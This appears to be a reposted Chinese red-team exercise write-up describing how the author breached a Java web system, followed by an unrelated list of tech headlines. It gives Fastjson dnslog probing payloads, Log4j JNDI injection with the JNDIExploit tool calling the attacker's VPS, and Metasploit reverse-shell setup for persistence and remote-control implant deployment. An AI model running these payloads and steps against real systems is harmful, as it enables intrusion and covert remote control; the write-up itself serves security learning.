当前位置：首页 > 科技 > 软件

记一次攻防演练打点过程

来源：责编：时间：2023-10-10 18:30:40 146观看

导读前言在如今错综复杂的网络环境，还有各种防护设备的加持，漏洞利用可谓难上加难。这里简单记录下在一次攻防演练中从打点到权限维持的曲折过程。过程前期先从备案查询、子域名收集、端口扫描等方式获取资产URL。其次对URL

前言

在如今错综复杂的网络环境，还有各种防护设备的加持，漏洞利用可谓难上加难。这里简单记录下在一次攻防演练中从打点到权限维持的曲折过程。

过程

前期先从备案查询、子域名收集、端口扫描等方式获取资产URL。其次对URL进行指纹识别，虽然发现了几个存在指纹的系统，但后续渗透发现漏洞已无法利用，漏洞已修。最后老实本分对其他Web系统进行渗透，寻找突破口。

01 前后端分离架构

前后端分离的开发架构已然成为互联网项目开发的主流模式，通过nginx+tomcat（中间加Node.js）来进行解耦，是未来的大型分布式架构、弹性计算架构、微服务架构和多端化服务的基础。

·前端：负责View和Controller层·后端：负责Model层，进行业务/数据处理

JAVA 更适合做 Model 层、持久层的业务，引入Node.js可进行Controller层的处理。Node.js作为桥梁架接服务端API输出的JSON数据。

02 WebPack资源管理

WebPack本身作为一个资源管理和打包构建工作，其强大之处在于各种静态资源的依赖分析和预编译。经过WebPack编译后得到各种静态资源，通常生成dist文件夹，保存各种静态文件。其结构大致如下：

而app.js文件通常包含了各类前端路由或者后端API接口，是我们渗透前后端系统的突破口。当然不仅仅只是app.js中会存在。

03 发现指纹Fastjson

使用burp插件，可自动从js中爬取前端路由或者后端API接口

当获取到后端API接口时，使用burp的Intruder模块对所有接口发送GET和POST请求，POST请求时可以构造json请求体发送。

部分接口进行GET请求时，后端返回缺失某参数，此时可构造该参数并进行SQL注入等漏洞利用。

此时从报错信息中发现某个接口使用Fastjson组件

于是利用DNS探测判断Fastjson版本

Fastjson < 1.2.43

{"@type":"java.URL","val":"http://dnslog"} {{"@type":"java.URL","val":"http://dnslog"}:"x"}

Fastjson < 1.2.48

{"@type":"java.InetAddress","val":"dnslog"}

Fastjson < 1.2.68

{"@type":"java.Inet6Address","val":"dnslog"}{{"@type":"java.URL","val":"dnslog"}:"aaa"}{{"@type":"com.alibaba.fastjson.JSONObject", {"@type": "java.URL", "val":"http://dnslog"}}""}{{"@type":"java.URL","val":"http://dnslog"}:0}

未发现DNSLog回显

04 发现log4j漏洞

字段Content-Type存在dnslog回显，先试试dns协议进行dnslog探测

可探测java版本，1.8.0_171版本

使用ldap协议进行dnslog探测

可探测服务器类型，Linux系统

可进行jndi注入利用，使用工具JNDIExploit-1.4-SNAPSHOT.jar

查看使用方式命令：java -jar JNDIExploit-1.4-SNAPSHOT.jar -u

使用TomcatEcho链执行命令并回显命令：java -jar JNDIExploit-1.4-SNAPSHOT.jar -i your-vps-ip

发送cmd命令请求

成功执行命令并回显，root权限

此时获取命令执行权限，如何进行权限维持？获取一个稳定的shell

05 权限维持

1）执行命令，直接反弹shell

2）执行命令，写入webshell

3）jndi注入工具支持打入内存马

4）jndi注入工具1.4版本新增支持上线msf

第一种尝试：执行bash、sh命令反弹shell，存在ldap请求，但反弹命令未执行成功；

第二种尝试：通过pwd、ls命令进行Web系统目录，发现服务由jar起的，写入webshell文件无法利用；

第三种尝试：VPS收到打入内存马的ldap请求，但访问内存马路径时显示404；

第四种尝试：使用tomcatBypass路由上线msf成功

msf开启监听，使用payload：java/meterpreter/reverse_tcp

设置LHOST、LPORT，执行run开启监听

发送ldap请求，请求tomcatBypass路由，IP是VPS的IP，PORT是msf监听的端口

上线msf，得到稳定式shell

得到shell，但无法进行直观目录浏览，而且shell是交互式shell，有没有更好的远控方式呢？

06 上线远控

在本公众号前面发过的文章中提到一款远控平台，自带某厂商证书，为免杀工作省去大量功夫。但上线命令需要使用curl命令，然而该机器上并没有curl命令。

没有curl，但有wget，可不可以使用wget替换curl，询问下chatgpt

答案是存在可替换的，但却达不到我们的效果

于是安装curl命令，但yum、apt-get等命令也没有

很奇怪的一个系统，大概率是个阉割版的docker容器，先看下系统版本类型

cat /etc/os-release

这种系统内核，百度下

是个docker无疑了，询问chatgpt该内核的系统如何下载curl

Apline Linux内核使用轻量级的apk包管理工具来管理软件包。执行一键安装命令，等待安装过程

安装完成，接下来使用curl命令一键上线远控。

总结

命令执行无法反弹shell或许是防护设备拦截所致。

本文作者：极致攻防实验室，转载请注明来自FreeBuf.COM

本文链接：http://www.28at.com/showinfo-26-12690-0.html记一次攻防演练打点过程

声明：本网页内容旨在传播知识，若有侵权等问题请及时与本网联系，我们将在第一时间删除处理。邮件：2376512515@qq.com

上一篇：如何优雅的处理Java异常？

下一篇： caliburn.micro日志打印，app.xaml里面如何配置？

标签：

热门焦点

Automa-通过连接块来自动化你的浏览器

1、前言通过浏览器插件可实现自动化脚本的录制与编写，具有代表性的工具就是：Selenium IDE、Katalon Recorder，对于简单的业务来说可快速实现自动化的上手工作。Selenium IDEKat
得物效率前端微应用推进过程与思考

一、背景效率工程随着业务的发展，组织规模的扩大，越来越多的企业开始意识到协作效率对于企业团队的重要性，甚至是决定其在某个行业竞争中突围的关键，是企业长久生存的根本。得物
之家push系统迭代之路

前言在这个信息爆炸的互联网时代，能够及时准确获取信息是当今社会要解决的关键问题之一。随着之家用户体量和内容规模的不断增大，传统的靠"主动拉"获取信息的方式已不能满足用
为什么你不应该使用Div作为可点击元素

按钮是为任何网络应用程序提供交互性的最常见方式。但我们经常倾向于使用其他HTML元素，如 div span 等作为 clickable 元素。但通过这样做，我们错过了许多内置浏览器的功能。
华为Mate60系列模具曝光：采用硕大圆形后置相机模组+拼接配色方案

据此前多方爆料，今年华为将开始恢复一年双旗舰战略，除上半年推出的P60系列外，往年下半年的Mate系列也将迎来更新，有望在9-10月份带来全新的华为Mate60
苹果、三星、惠普等暂停向印度出口笔记本和平板电脑

集微网消息，据彭博社报道，在8月3日印度突然禁止在没有许可证的情况下向印度进口电脑/平板及显示器等产品后，苹果、三星电子和惠普等大公司暂停向印度
到手价3099元起！iQOO Neo8 Pro今日首销：安卓性能最强旗舰

5月23日，iQOO如期举行了新品发布会，全新的iQOO Neo8系列也正式与大家见面，包含iQOO Neo8和iQOO Neo8 Pro两个版本，其中标准版搭载高通骁龙8+，而Pro版更
苹果140W USB-C充电器：采用氮化镓技术

据10 月 30 日 9to5 Mac 消息报道，当苹果推出新的 MacBook Pro 2021 时，该公司还推出了新的 140W USB-C 充电器，附赠在 MacBook Pro 16 英寸机型的盒子里，也支
北京：科技教育体验基地开始登记

　　北京“科技馆之城”科技教育体验基地登记和认证工作日前启动。首批北京科技教育体验基地拟于2023年全国科普日期间挂牌，后续还将开展常态化登记。　　北京科技教育体验基